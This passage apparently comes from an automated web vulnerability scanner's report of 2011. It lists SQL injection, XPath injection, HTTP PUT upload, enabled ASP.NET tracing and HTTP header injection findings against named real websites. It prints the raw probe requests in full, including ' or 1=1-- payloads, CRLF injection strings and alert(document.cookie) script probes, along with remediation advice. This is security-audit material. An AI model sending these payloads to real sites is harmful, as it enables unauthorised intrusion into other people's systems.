<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /favicon.ico
on this server.</p>
<hr>
<address>Apache/2.2.3 (Oracle) Server at www.state.de.us Port 80</address>
</body></html>

Request 2

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.342840175'%20or%201%3d2--%20
Host: www.state.de.us
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:25:02 GMT
Server: Apache/2.2.3 (Oracle)
Content-Length: 289
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /favicon.ico was not found on this server.</p>
<hr>
<address>Apache/2.2.3 (Oracle) Server at www.state.de.us Port 80</address>
</body></html>

1.24. http://www.straight.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.straight.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 14199974'%20or%201%3d1--%20 and 14199974'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /favicon.ico14199974'%20or%201%3d1--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.straight.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:17:55 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.17
Cache-Control: public, max-age=600
Last-Modified: Tue, 03 May 2011 10:17:55 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1304417875"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 35940

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" la
...[SNIP]...
<!--
jQuery.extend(Drupal.settings, {"basePath":"\/","CTools":{"pageId":"page-7dcb086346dee91c75c038bf98df80eb"},"thickbox":{"close":"Close","next":"Next \u003e","prev":"\u003c Prev","esc_key":"or Esc Key","next_close":"Next \/ Close on last","image_count":"Image !current of !total"},"extlink":{"extTarget":"_blank","extClass":"ext","extSubdomains":1,"extExclude":"(livenation\\.com\\\/edp)|(static\\.ak\\.fbcdn.net\\\/connect\\.php)|(www\\.addthis\\.com\\\/bookmark\\.php)","extInclude":"","extAlert":0,"extAlertText":"This link will take you to an external web site. We are not responsible for their content.","mailtoClass":"mailto"}});
//--><!]]>
</script>
<script type="text/javascript">
<!--//--><![CDATA[//><!--
overMenuDefault = 'dynamic-persistent-menu-menu';
//--><!]]>
</script>
<script type="text/javascript">
<!--//--><![CDATA[//><!--
subMenuTimeout = 3600000;
//--><!]]>
</script>
<script type="text/javascript">
<!--//--><![CDATA[//><!--
document.write(unescape("%3Cscript src='http://partner.googleadservices.com/gampad/google_service.js' type='text/javascript'%3E%3C/script%3E"));

//--><!]]>
</script>
<script type="text/javascript">
<!--//--><![CDATA[//><!--
GS_googleAddAdSenseService("ca-pub-1107966834184205");
GS_googleEnableAllServices();

//--><!]]>
</script>
<script type="text/javascript">
<!--//--><![CDATA[//><!--
GA_googleAddSlot("ca-pub-1107966834184205", "CouponsVertical");
GA_googleAddSlot("ca-pub-1107966834184205", "Banner");
GA_googleAddSlot("ca-pub-1107966834184205", "Leaderboard");
GA_googleAddSlot("ca-pub-1107966834184205", "Leaderboard_Bottom");

//--><!]]>
</script>
<script type="text/javascript">
<!--//--><![CDATA[//><!--
GA_googleFetchAds();

//--><!]]>
</script>

<script language="javascript" type="text/javascript" src="/js/article_specific.js.min"></script>

<script language="javascript" type="text/javascript" src="/js/global.js.min.js"></script>

<script language="JavaScript">GA_googleAddAttr("section", "Arts");</script>
<script language="JavaScript">GA_googleAddAttr("section", "arts");</script>
<script language="
...[SNIP]...

Request 2

GET /favicon.ico14199974'%20or%201%3d2--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.straight.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:17:57 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.17
Cache-Control: public, max-age=600
Last-Modified: Tue, 03 May 2011 10:17:57 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1304417877"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 35837

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" la
...[SNIP]...
<!--
jQuery.extend(Drupal.settings, {"basePath":"\/","CTools":{"pageId":"page-3f30ff464c7cd7b159b1d2163f648e81"},"thickbox":{"close":"Close","next":"Next \u003e","prev":"\u003c Prev","esc_key":"or Esc Key","next_close":"Next \/ Close on last","image_count":"Image !current of !total"},"extlink":{"extTarget":"_blank","extClass":"ext","extSubdomains":1,"extExclude":"(livenation\\.com\\\/edp)|(static\\.ak\\.fbcdn.net\\\/connect\\.php)|(www\\.addthis\\.com\\\/bookmark\\.php)","extInclude":"","extAlert":0,"extAlertText":"This link will take you to an external web site. We are not responsible for their content.","mailtoClass":"mailto"}});
//--><!]]>
</script>
<script type="text/javascript">
<!--//--><![CDATA[//><!--
overMenuDefault = 'dynamic-persistent-menu-menu';
//--><!]]>
</script>
<script type="text/javascript">
<!--//--><![CDATA[//><!--
subMenuTimeout = 3600000;
//--><!]]>
</script>
<script type="text/javascript">
<!--//--><![CDATA[//><!--
document.write(unescape("%3Cscript src='http://partner.googleadservices.com/gampad/google_service.js' type='text/javascript'%3E%3C/script%3E"));

//--><!]]>
</script>
<script type="text/javascript">
<!--//--><![CDATA[//><!--
GS_googleAddAdSenseService("ca-pub-1107966834184205");
GS_googleEnableAllServices();

//--><!]]>
</script>
<script type="text/javascript">
<!--//--><![CDATA[//><!--
GA_googleAddSlot("ca-pub-1107966834184205", "CouponsVertical");
GA_googleAddSlot("ca-pub-1107966834184205", "Banner");
GA_googleAddSlot("ca-pub-1107966834184205", "Leaderboard");
GA_googleAddSlot("ca-pub-1107966834184205", "Leaderboard_Bottom");

//--><!]]>
</script>
<script type="text/javascript">
<!--//--><![CDATA[//><!--
GA_googleFetchAds();

//--><!]]>
</script>

<script language="javascript" type="text/javascript" src="/js/article_specific.js.min"></script>

<script language="javascript" type="text/javascript" src="/js/global.js.min.js"></script>

<script language="JavaScript">GA_googleAddAttr("section", "homepage");</script>
<script language="JavaScript">GA_googleAddAttr("section", "");</script>
<script language="
...[SNIP]...

1.25. http://www.thechildrenswearoutlet.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.thechildrenswearoutlet.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 54576496%20or%201%3d1--%20 and 54576496%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /favicon.ico?154576496%20or%201%3d1--%20=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thechildrenswearoutlet.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 302 Moved Temporarily
Date: Tue, 03 May 2011 10:35:27 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.13
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: -1
Last-Modified: Tue, 03 May 2011 10:35:27 GMT
Location: http://thechildrenswearoutlet.com/?sef_rewrite=1
Content-Length: 0
Content-Type: text/html; charset=utf-8

Request 2

GET /favicon.ico?154576496%20or%201%3d2--%20=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thechildrenswearoutlet.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:35:29 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Wed, 14 Apr 2010 19:20:24 GMT
ETag: "53a82e0-47e-4843745164e00"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: image/x-icon

............ .h.......(....... ..... .....................................................................f...b}..j...v...w.......................................................s..._...p...................}...}.......................~...............f.......................Yv..O]..fj..[`..W^..dr..j...p.......................................as..s~..MQ..QP..JH..BM..z......................................................x...y.......................................}...~...........r...i...s................................................Zr......]r..v...........v...z...........................................w...q...........q~..|...........................................\o..u...........v..........................y...............q...k~..t...{...x...u...........p...........084.R]r.............j~..]q..x...eq..hx..k...v...........i|..'.!.....IZk.............z...l...]fW.....>DA.L`..................o...x...................}.......Zn... .&4M.x.......................{...y...{...............v..........~..................................................z...t...s...o...j.......................................................................

2. ASP.NET tracing enabled  previous  next
There are 4 instances of this issue:

Issue background

ASP.NET tracing is a debugging feature which is designed for use during development to help troubleshoot problems. It discloses sensitive information to users, and if enabled in production contexts may present a serious security threat.

Application-level tracing enables any user to retrieve full details about recent requests to the application, including those of other users. This information includes session tokens and request parameters, which may enable an attacker to compromise other users and even take control of the entire application.

Page-level tracing returns the same information, but relating only to the current request. This may still contain sensitive data in session and server variables which would be of use to an attacker.

Issue remediation

To disable tracing, open the Web.config file for the application, and find the <trace> element within the <system.web> section. Either set the enabled attribute to "false" (to disable tracing) or set the localOnly attribute to "true" (to enable tracing only on the server itself).

Note that even with tracing disabled in this way, it is possible for individual pages to turn on page-level tracing either within the Page directive of the ASP.NET page, or programmatically through application code. If you observe tracing output only on some application pages, you should review the page source and the code behind, to find the reason why tracing is occurring.

It is strongly recommended that you refer to your platform's documentation relating to this issue, and do not rely solely on the above remediation.



2.1. http://www.allentate.com/trace.axd  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.allentate.com
Path:   /trace.axd

Issue detail

ASP.NET tracing appears to be enabled at the application level.

Request

GET /trace.axd HTTP/1.0
Host: www.allentate.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 May 2011 10:36:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 4641
Set-Cookie: Coyote-2-42a2c514=42a2c505:0;Path=/

<html>
<head>
<style type="text/css">
span.tracecontent b { color:white }
span.tracecontent { background-color:white; color:black;font: 10pt verdana, arial; }
span.tracecontent table { clear:left
...[SNIP]...
<body>
<span class="tracecontent">
<table cellspacing="0" cellpadding="0" border="0" width="100%">
...[SNIP]...

2.2. http://www.endlessvacation.com/trace.axd  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.endlessvacation.com
Path:   /trace.axd

Issue detail

ASP.NET tracing appears to be enabled at the application level.

Request

GET /trace.axd HTTP/1.0
Host: www.endlessvacation.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 May 2011 10:20:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 4626

<html>
<head>
<style type="text/css">
span.tracecontent b { color:white }
span.tracecontent { background-color:white; color:black;font: 10pt verdana, arial; }
span.tracecontent table { clear:left
...[SNIP]...
<body>
<span class="tracecontent">
<table cellspacing="0" cellpadding="0" border="0" width="100%">
...[SNIP]...

2.3. http://www.identitychecks.com/trace.axd  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.identitychecks.com
Path:   /trace.axd

Issue detail

ASP.NET tracing appears to be enabled at the application level.

Request

GET /trace.axd HTTP/1.0
Host: www.identitychecks.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 May 2011 10:21:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server, Enterprise Edition
Set-Cookie: SourceCode=9KWB18; expires=Wed, 04-May-2011 10:21:50 GMT; path=/
Set-Cookie: StoreSourceCode=9KWB18; expires=Wed, 04-May-2011 10:21:50 GMT; path=/
Set-Cookie: TrackingSourceCode=9KWB18; expires=Wed, 04-May-2011 10:21:50 GMT; path=/
Set-Cookie: IDENT_CD_Cookie={6d0c0bb7-ba56-4773-bf25-81411b14a2c4}; expires=Fri, 03-May-2041 10:21:50 GMT; path=/
Set-Cookie: IDENT_CD_Cookie={6d0c0bb7-ba56-4773-bf25-81411b14a2c4}; expires=Fri, 03-May-2041 10:21:50 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8

<html>
<head>
<style type="text/css">
span.tracecontent b { color:white }
span.tracecontent { background-color:white; color:black;font: 10pt verdana, arial; }
span.tracecontent table { clear:left
...[SNIP]...
<body>
<span class="tracecontent">

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">
...[SNIP]...

2.4. http://www.woodworking.com/trace.axd  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.woodworking.com
Path:   /trace.axd

Issue detail

ASP.NET tracing appears to be enabled at the application level.

Request

GET /trace.axd HTTP/1.0
Host: www.woodworking.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Tue, 03 May 2011 10:26:21 GMT
Connection: close

<html>
<head>
<style type="text/css">
span.tracecontent b { color:white }
span.tracecontent { background-color:white; color:black;font: 10pt verdana, arial; }
span.tracecontent table { clear:left
...[SNIP]...
<body>
<span class="tracecontent">


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
...[SNIP]...

3. XPath injection  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.atlanta.net
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Issue background

XPath injection vulnerabilities arise when user-controllable data is incorporated into XPath queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Depending on the purpose for which the vulnerable query is being used, an attacker may be able to exploit an XPath injection flaw to read sensitive application data or interfere with application logic.

Issue remediation

User input should be strictly validated before being incorporated into XPath queries. In most cases, it will be appropriate to accept input containing only short alhanumeric strings. At the very least, input containing any XPath metacharacters such as " ' / @ = * [ ] ( and ) should be rejected.

Request

GET /favicon.ico' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.atlanta.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 500 Internal Server Error
Date: Tue, 03 May 2011 10:51:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 10203

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +1123732
MS.Internal.Xml.XPath.XPathScanner.NextLex() +3962705
MS.Internal.Xml.XPath.XPathParser.ParsePrimaryExpr(AstNode qyInput) +3947904
MS.Internal.Xml.XPath.
...[SNIP]...

4. HTTP PUT enabled  previous  next
There are 2 instances of this issue:

Issue background

The HTTP PUT method is used to upload data which is saved on the server at a user-supplied URL. If enabled, an attacker can place arbitrary, and potentially malicious, content into the application. Depending on the server's configuration, this may lead to compromise of other users (by uploading client-executable scripts), compromise of the server (by uploading server-executable code), or other attacks.

Issue remediation

You should refer to your platform's documentation to determine how to disable the HTTP PUT method on the server.


4.1. http://www.findire.com/favicon.ico  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.findire.com
Path:   /favicon.ico

Issue detail

HTTP PUT is enabled on the web server. The file /d4df4917b70f8242.txt was uploaded to the server using the PUT verb, and the contents of the file were subsequently retrieved using the GET verb.

Request 1

PUT /d4df4917b70f8242.txt HTTP/1.0
Host: www.findire.com
Content-Length: 16

310947143a6b91b6

Response 1

HTTP/1.1 201 Created
Connection: close
Date: Tue, 03 May 2011 10:45:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: http://www.findire.com/d4df4917b70f8242.txt
Content-Length: 0
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, LOCK, UNLOCK

Request 2

GET /d4df4917b70f8242.txt HTTP/1.0
Host: www.findire.com

Response 2

HTTP/1.1 200 OK
Content-Length: 16
Content-Type: text/plain
Last-Modified: Tue, 03 May 2011 10:45:01 GMT
Accept-Ranges: bytes
ETag: W/"ec633c277f9cc1:3a6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:45:00 GMT
Connection: close

310947143a6b91b6

4.2. http://www.thenursingscholars.com/favicon.ico  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thenursingscholars.com
Path:   /favicon.ico

Issue detail

HTTP PUT is enabled on the web server. The file /9ca2d0099ce061f7.txt was uploaded to the server using the PUT verb, and the contents of the file were subsequently retrieved using the GET verb.

Request 1

PUT /9ca2d0099ce061f7.txt HTTP/1.0
Host: www.thenursingscholars.com
Content-Length: 16

4b19641b55482e5d

Response 1

HTTP/1.1 201 Created
Connection: close
Date: Tue, 03 May 2011 10:38:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: http://www.thenursingscholars.com/9ca2d0099ce061f7.txt
Content-Length: 0
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, LOCK, UNLOCK

Request 2

GET /9ca2d0099ce061f7.txt HTTP/1.0
Host: www.thenursingscholars.com

Response 2

HTTP/1.1 200 OK
Content-Length: 16
Content-Type: text/plain
Last-Modified: Tue, 03 May 2011 10:38:45 GMT
Accept-Ranges: bytes
ETag: W/"40d147477e9cc1:a1c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:38:44 GMT
Connection: close

4b19641b55482e5d

5. HTTP header injection  previous  next
There are 10 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


5.1. http://ad.doubleclick.net/ad/tnews.lee.net/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/tnews.lee.net/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 15392%0d%0ac029a9949ab was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /15392%0d%0ac029a9949ab/tnews.lee.net/;r=1;sz=300x250;ord=123456789ord=0.7145021600827461?? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1190;c=1;s=1;d=9;w=300;h=250;$=audiencescience300x250
Cookie: id=c60bd0733000097||t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/15392
c029a9949ab
/tnews.lee.net/;r=1;sz=300x250;ord=123456789ord=0.7145021600827461:
Date: Tue, 03 May 2011 15:42:25 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

5.2. http://ad.doubleclick.net/adi/N763.no_url_specifiedOX2462/B4639841.8 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N763.no_url_specifiedOX2462/B4639841.8

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 14b28%0d%0a15d18364756 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /14b28%0d%0a15d18364756/N763.no_url_specifiedOX2462/B4639841.8;sz=300x250;click=http://cdslog.contextweb.com/CDSLogger/L.aspx?q=C~503597~2587~54012~108044~94417~3~0~0~maysville-online.com~2~8~1~0~2~1~PEiOeaHGRLH4quYZj5mgESimscR103Gq~16~2~gDLdEnJ4dUI3~RiC6i2pCL3Ub~1~0~1~~;ord=1771002466? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1190;c=1;s=1;d=9;w=300;h=250;$=audiencescience300x250
Cookie: id=c60bd0733000097||t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/14b28
15d18364756
/N763.no_url_specifiedOX2462/B4639841.8;sz=300x250;click=http: //cdslog.contextweb.com/CDSLogger/L.aspx
Date: Tue, 03 May 2011 15:42:39 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

5.3. http://ad.doubleclick.net/adj/cm.rev_lee/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/cm.rev_lee/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 7b98a%0d%0a6411b0e67d0 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /7b98a%0d%0a6411b0e67d0/cm.rev_lee/;net=cm;u=,cm-77237941_1304437410,11fda490648f83c,Miscellaneous,ax.300;;cmw=owl;sz=300x250;net=cm;ord1=975335;contx=Miscellaneous;an=300;dc=w;btg=;ord=0.3433780161396228? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/content/?c3a2e%22-alert(%22DORK%22)-%22f8cf8d87874=1
Cookie: id=c60bd0733000097||t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/7b98a
6411b0e67d0
/cm.rev_lee/;net=cm;u=,cm-77237941_1304437410,11fda490648f83c,Miscellaneous,ax.300;;cmw=owl;sz=300x250;net=cm;ord1=975335;contx=Miscellaneous;an=300;dc=w;btg=;ord=0.3433780161396228:
Date: Tue, 03 May 2011 15:44:57 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

5.4. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js [$ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into the Set-Cookie response header. The payload e6567%0d%0aedcda395a45 was submitted in the $ parameter. This caused a response containing an injected HTTP header.

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1&a=0&f=&n=1190&r=5&d=9&q=&$=e6567%0d%0aedcda395a45&s=1&z=0.01697743690668352 HTTP/1.1
Host: d7.zedo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/favicon.ico?be4e4%22-alert(1)-%22ccebc516c28=1
Cookie: ZCBC=1; FFgeo=2241452; FFcat=1190,1,9; FFad=0; FFChanCap=1583B1190,1#675962|0,1,1; ZEDOIDA=-SHATcGt89Z6bBFZFIn3XV-r~050311; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1190:e6567
edcda395a45
;expires=Wed, 04 May 2011 05: 00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1190,1,9;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1583B1190,1#675962#675816|0,1,1:0,1,1;expires=Thu, 02 Jun 2011 15:41:13 GMT;path=/;domain=.zedo.com;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 1634247266 1634246238
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=121
Expires: Tue, 03 May 2011 15:43:14 GMT
Date: Tue, 03 May 2011 15:41:13 GMT
Connection: close
Content-Length: 2322

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',e6567
ed
...[SNIP]...

5.5. http://d7.zedo.com/bar/v16-405/d3/jsc/fmr.js [$ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fmr.js

Issue detail

The value of the $ request parameter is copied into the Set-Cookie response header. The payload 18d0f%0d%0a36d0a27c0b4 was submitted in the $ parameter. This caused a response containing an injected HTTP header.

Request

GET /bar/v16-405/d3/jsc/fmr.js?c=1&a=0&f=&n=1190&r=5&d=9&q=&$=18d0f%0d%0a36d0a27c0b4&s=1&z=0.9079998980845427 HTTP/1.1
Host: d7.zedo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/favicon.ico?be4e4%22-alert(document.cookie)-%22ccebc516c28=1
